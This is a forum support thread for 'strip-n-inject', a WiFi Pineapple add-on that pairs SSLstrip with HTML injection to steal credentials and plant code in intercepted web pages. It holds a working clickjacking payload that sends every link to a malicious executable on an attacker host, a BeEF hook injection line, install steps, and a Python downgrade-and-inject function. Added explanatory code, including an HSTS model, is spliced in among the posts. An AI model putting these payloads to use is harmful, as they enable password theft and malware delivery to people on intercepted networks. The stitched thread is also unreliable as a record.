
[Support] strip-n-inject


leg3nd


Description: This infusion will inject HTML code into a response from a server. The issue with ettercap and other proxies is that they cannot inject into SSL sessions as a result of the encryption. This infusion takes Moxie's SSLstrip and uses that as the proxy that injects code. This architecture provides 2 main benefits:

  1. Strip SSL from sessions before injecting code which allows for a larger attack surface.
  2. An asynchronous, non-blocking socket proxy provided by twisted-web gives much better performance from the client's point of view.

The attacks that can be implemented from this are endless: SSLstrip for stealing passwords and injecting a BeEF hook, or Java applets, or Browser_AutoPwn in an iframe. All these and more will be possible via JasagerPwn or manually.

Feature Set:

  • Installer - The installer will set up the SSLStrip dependencies. This will probably even fix your normal sslstrip infusion if you're having issues with it.
    • Note: This does not use the default SSLStrip on the system, since SSLStrip had to be modified for this purpose.
  • Log Output - Displays the standard output log that is generated by the modified SSLStrip. Yes, you can still get passwords from here in the process.
  • Attacker (single address) filter - Pretty self-explanatory: this adds a '! -s attacker_ip' to the iptables rule so you do not inject code into your own browsing sessions.
  • Injection Code Editor - Allows you to enter any arbitrary code into the text editor. Note: if you have an attack running and modify this code, you need to restart the attack.
  • Auto Refresh
  • Enable/Disable and Logging in Small Tile

Screenshot (Interface):
Screenshot_10252013_08_14_21_AM.jpg

Screenshot (Basic Alert Pop-up):
alert_example.jpg

Credit:

  • Infusion GUI: Whistle Master
  • SSLStrip: Moxie Marlinspike

Cheers! :ph34r:

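The two things the description above says the proxy does to a server response, downgrading HTTPS to HTTP and injecting HTML, as an added worked example. This is not code from the strip-n-inject infusion or from sslstrip; it models the behaviour on a raw HTTP/1.x response held as bytes. The sample responses, the hook URL and the attacker address are constructed for the example.

```python
"""Added example (not code from the strip-n-inject infusion or from sslstrip).

Models what the proxy described above does to one server response:
  1. sslstrip-style downgrade: "https://" in a redirect's Location header and in
     page links becomes "http://", keeping the victim on the cleartext side;
  2. HTML injection: a payload is placed before </body> in text/html bodies, with
     Content-Length recomputed so the browser does not truncate the page.
Works on a raw, non-chunked HTTP/1.x response held as bytes. The responses and the
BeEF hook URL below are constructed sample data.
"""
import gzip
import re

HTTPS_RE = re.compile(rb"https://", re.IGNORECASE)

# Constructed sample payload; the host is an assumed attacker address, as in the thread.
PAYLOAD = b'<script src="http://172.16.42.3:3000/hook.js"></script>'


def parse_response(raw: bytes):
    """Split a raw response into status line, [(name, value)] headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def get_header(headers, name):
    for n, v in headers:
        if n.lower() == name.lower():
            return v
    return None


def set_header(headers, name, value):
    """Replace (or add) a header, keeping the others in order."""
    return [(n, v) for n, v in headers if n.lower() != name.lower()] + [(name, value)]


def rebuild(status, headers, body):
    head = b"\r\n".join([status] + [n + b": " + v for n, v in headers])
    return head + b"\r\n\r\n" + body


def strip_and_inject(raw: bytes, payload: bytes = PAYLOAD) -> bytes:
    status, headers, body = parse_response(raw)

    # 1) A 301/302 to https:// is rewritten to http:// (the "initiated on 80 and then
    #    redirected to 443" case). Nothing else in a redirect is touched.
    loc = get_header(headers, b"Location")
    if loc is not None:
        headers = set_header(headers, b"Location", HTTPS_RE.sub(b"http://", loc))

    # 2) Only HTML is tampered with; images, scripts, JSON pass through unchanged.
    ctype = get_header(headers, b"Content-Type") or b""
    if not ctype.lower().startswith(b"text/html"):
        return rebuild(status, headers, body)

    # A compressed body is the usual reason a payload "never shows up": searching
    # gzip bytes for </body> finds nothing. Decompress and serve identity-encoded.
    if (get_header(headers, b"Content-Encoding") or b"").lower() == b"gzip":
        body = gzip.decompress(body)
        headers = [(n, v) for n, v in headers if n.lower() != b"content-encoding"]

    body = HTTPS_RE.sub(b"http://", body)  # downgrade links inside the page
    idx = body.lower().rfind(b"</body>")
    body = body[:idx] + payload + body[idx:] if idx != -1 else body + payload
    headers = set_header(headers, b"Content-Length", str(len(body)).encode())
    # no-store keeps the browser from re-using an already tampered copy; it plays the
    # same role as the <meta http-equiv="cache-control"> in the thread's payloads.
    headers = set_header(headers, b"Cache-Control", b"no-store")
    return rebuild(status, headers, body)


# Constructed sample responses.
REDIRECT = (b"HTTP/1.1 302 Found\r\nLocation: https://login.example.test/auth\r\n"
            b"Content-Length: 0\r\n\r\n")
HTML_PLAIN = b'<html><body><a href="https://login.example.test/auth">Sign in</a></body></html>'
HTML_GZ_BODY = gzip.compress(HTML_PLAIN)
HTML_GZ = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\n"
           b"Content-Encoding: gzip\r\nContent-Length: " + str(len(HTML_GZ_BODY)).encode()
           + b"\r\n\r\n" + HTML_GZ_BODY)
PNG = b"HTTP/1.1 200 OK\r\nContent-Type: image/png\r\nContent-Length: 4\r\n\r\n\x89PNG"

if __name__ == "__main__":
    for sample in (REDIRECT, HTML_GZ, PNG):
        print(strip_and_inject(sample).decode("latin-1"))
        print("-" * 40)
```

The real proxy sits in twisted-web and sees the response as a parsed object rather than raw bytes, but the checks are the same ones worth keeping in mind when a payload does not appear: is the response actually text/html, is the body compressed, does it contain a `</body>` to anchor on, and was Content-Length fixed afterwards.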

Cool, please report any bugs so I can get them fixed up.

This is my advice on the SSLstrip issues:

  • If SSLStrip is already working for you: don't press Install, because it will "just work" regardless of whether it says "not installed".
  • If SSLstrip is not working: the "Install" will likely fix it, based on previous forum posts about SSLstrip installations.

This is basically the install script if you feel like trying it manually:

#!/bin/sh
# Reinstall twisted-web so the proxy's dependencies match the current package feed.
opkg remove twisted-web --force-depends && opkg update && opkg install twisted-web

# The Python packages are installed on the SD card; link them into the on-board
# site-packages so the modified sslstrip can import pyOpenSSL and twisted.web.
if [ ! -e "/usr/lib/python2.7/site-packages/OpenSSL" ]; then
  ln -s /sd/usr/lib/python2.7/site-packages/OpenSSL /usr/lib/python2.7/site-packages/
fi

if [ ! -e "/usr/lib/python2.7/site-packages/twisted/web" ]; then
  ln -s /sd/usr/lib/python2.7/site-packages/twisted/web /usr/lib/python2.7/site-packages/twisted/
fi


If it doesn't "just work", which it should with the Install button, then you might need to SSH in to debug it.

I'm sure you can theoretically do that by going into the "Injection Code" tab, removing all code, and saving it. This infusion is really not meant for sniffing passwords, though: it lacks filters, log saving, less verbose output, etc. This infusion is meant for injecting code for more advanced attack vectors.

If you have this infusion working, you should be able to sniff passwords with the normal "sslstrip" infusion, as they use the same dependencies.


Whoops, your infusion is working like a charm, also the password sniffing, but I am unable to clear the sslstrip issue.

Anyway: <script>window.alert("You have new e-mail messages!");</script> looks cool :-)

I'm not into the injection code. I have programming next year and hope to learn some more then. At the moment it's all networking and Windows Server at school, which is also taking a lot of time now...

Got to make choices, man, but love your infusion ;-)


Just wanted to say thanks. Prior to installing your infusion, SSLStrip was broken. In addition to the fun HTML injection, your infusion posts creds. Good work.

Add logging and I won't have a use for the SSLStrip infusion.



The great thing is that you don't need to know programming to mount these attacks. That's what this script is for: https://forums.hak5.org/index.php?showtopic=30588

It will automate many advanced attack vectors that utilize code injection for you, generally with the purpose of returning a meterpreter shell.


I guess I could add logging/filtering to this... but that wasn't the original purpose of the infusion. If the SSLstrip module doesn't get updated then I'll just grab that logic and add it to this so it can be used for both sniffing and code injection.


Hey, what is the new update from today about, with the following new injection code?

<meta http-equiv="cache-control" content="no-cache">
<meta http-equiv="X-UA-Compatible" content="IE=9">
<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>
<script>
$(document).ready(function(){
  var div=document.createElement("div");
  div.id="overlayclick";
  div.style.zIndex="100";
  div.style.width="100%";
  div.style.height="100%";
  div.style.position="fixed";
  div.onclick=function(){window.open("http://172.16.42.160/run.php")};
  if(document.body.firstChild)document.body.insertBefore(div,document.body.firstChild);
  else document.body.appendChild(div)
});
</script>
<script>
$(document).ready(function(){$("a").attr("href","http://172.16.42.160/run.php")});
</script>

regards!


Whoops - that's the code from the ClickJacking attack that's implemented in JasagerPwn. It basically replaces all links on the page with a download of a malicious executable as a user browses. The main purpose I made this infusion for was the attack vectors I have in JasagerPwn.

The update mainly added some failsafe code to ensure the iptables commands are removed correctly and added additional verbosity to the log output.

Feel free to replace it with: <script>window.alert("Pineapple!")</script> for the simple popup window.


Hi leg3nd, good job.

Take a look to this repo: https://github.com/xtr4nge/sslstrip

Response tamperer support (@kkotowicz) and Code Injection was implemented (@xtr4nge) in the same SSLStrip fork.

Options:
-t <config>, --tamper <config>    Enable response tampering with settings from <config>.
-i , --inject                     Inject code into HTML pages using a text file (default inject.txt)

For code injection you can use the -i option and the file path, so you don't need to use the hardcoded file path/name.

Also you can implement more advanced attacks using the -t option.

I'm adding these functionalities to my project this week.

regards,



Very cool.

Looks like the primary difference here is that you can target specific sites with specific code, different content-types, etc. I'll swap this infusion over to this port of SSLstrip to allow for more granular attacks.

Thanks!


Naw, not anytime soon. I can hack things together but don't care to spend my time doing web development.

Standardization is a good thing imo. No point in reinventing the wheel.

I guess if there became a need I might do it, but I'm not much of a GUI fan to begin with. I barely use it in my pentests.



Hi leg3nd

Here you have a few screenshots of my SSLStrip fork implemented.

https://github.com/xtr4nge/FruityWifi/wiki/Tutorial-(SSLStrip)

regards,



Does this new script bypass HSTS protection?

It was not designed with that in mind. I can look into the possibility of bypassing it if that is of interest to you.

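What HSTS does to the downgrade trick discussed in the question above, as an added example that is not code from the infusion, from sslstrip or from the fork linked earlier in the thread. It is a minimal model of the browser-side HSTS cache described in RFC 6797: a host that has previously sent Strict-Transport-Security over TLS is rewritten to https:// before any request leaves the browser, so an http:// Location produced by the proxy is never followed. The hostnames, header values and preload entries are constructed sample data.

```python
"""Added example: a minimal model of a browser's HSTS cache (RFC 6797).

Not from the strip-n-inject infusion or sslstrip. Shows why an sslstrip-style
downgrade stops working for a host the browser already knows: the URL is upgraded
to https:// client-side, before the proxy ever sees a cleartext request. Hosts,
header values and preload entries below are constructed sample data.
"""
import re
from urllib.parse import urlsplit, urlunsplit

MAX_AGE_RE = re.compile(r"max-age\s*=\s*\"?(\d+)\"?", re.IGNORECASE)
INCLUDE_SUB_RE = re.compile(r"includeSubDomains", re.IGNORECASE)


class HstsCache:
    def __init__(self, preload=()):
        # host -> (expiry_epoch_seconds, include_subdomains). Preloaded hosts never
        # expire and are trusted on the very first visit, closing the bootstrap gap.
        self.entries = {h.lower(): (float("inf"), True) for h in preload}

    def observe(self, host, scheme, header_value, now):
        """Process a Strict-Transport-Security header seen on a response."""
        # RFC 6797 s8.1: the header counts only when received over TLS. The cleartext
        # side that a stripping proxy speaks can therefore neither set nor clear it.
        if scheme != "https" or header_value is None:
            return
        m = MAX_AGE_RE.search(header_value)
        if not m:
            return  # max-age is mandatory; a header without it is ignored
        max_age = int(m.group(1))
        host = host.lower()
        if max_age == 0:
            self.entries.pop(host, None)  # the server withdrew its policy
            return
        include_sub = INCLUDE_SUB_RE.search(header_value) is not None
        self.entries[host] = (now + max_age, include_sub)

    def is_known(self, host, now):
        """True if host, or a parent with includeSubDomains, has a live policy."""
        labels = host.lower().split(".")
        for i in range(len(labels)):
            entry = self.entries.get(".".join(labels[i:]))
            if entry is None:
                continue
            expiry, include_sub = entry
            if expiry <= now:
                continue  # expired policies no longer protect the host
            if i == 0 or include_sub:
                return True
        return False

    def upgrade(self, url, now):
        """Rewrite http:// to https:// for known hosts (port 80 becomes 443)."""
        parts = urlsplit(url)
        if parts.scheme != "http" or parts.hostname is None:
            return url
        if not self.is_known(parts.hostname, now):
            return url  # unknown host: the cleartext request goes out as-is
        netloc = parts.netloc[:-3] if parts.netloc.endswith(":80") else parts.netloc
        return urlunsplit(("https", netloc, parts.path, parts.query, parts.fragment))


if __name__ == "__main__":
    cache = HstsCache(preload=["preloaded.test"])
    t = 1_000_000.0
    print(cache.upgrade("http://bank.test/login", t))   # first visit: stays http
    cache.observe("bank.test", "https", "max-age=31536000; includeSubDomains", t)
    print(cache.upgrade("http://bank.test/login", t))   # now upgraded client-side
    print(cache.upgrade("http://mail.preloaded.test/", t))
```

The first request to a host the browser has never seen over TLS is still downgradeable, which is what the preload list exists to cover; once a policy is cached, the proxy's rewritten http:// redirect is upgraded again before it is ever sent.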


I notice there's a lot of talk about SSLStrip.

Just for example, the Android application for Facebook: has anyone had success preventing SSL on Android applications?

It really depends on the implementation of the specific application. For example, if the application initiated the connection on 80 and then was redirected (HTTP 301/302) to 443, then yes, it would work.

However, most application development teams, especially ones the size and maturity of Facebook's, would likely just initiate the connection straight to 443. This is the kind of silly mistake that Secure Development Life Cycles look to prevent.



Hi @leg3nd, I tried your infusion many times but never succeeded in injecting hook.js into traffic through my Pineapple. I configured my Pineapple to work in "client mode"; my inject code is "<meta http-equiv="cache-control" content="no-cache" /><script src=\"http://172.16.42.3:3000/hook.js\" type=\"text/javascript\"></script>". My laptop is Kali Linux (172.16.42.3) running the BeEF server. I SSH to the Pineapple (172.16.42.1) and run start.sh from "/pineapple/components/infusions/strip-n-inject/includes/".

Everything seems OK, but when I test surfing the web through the Pineapple, the HTML page is not injected; I checked the source code of the HTML response and it does not have hook.js.

I don't know what's wrong. Can you help me? Thanks a lot!

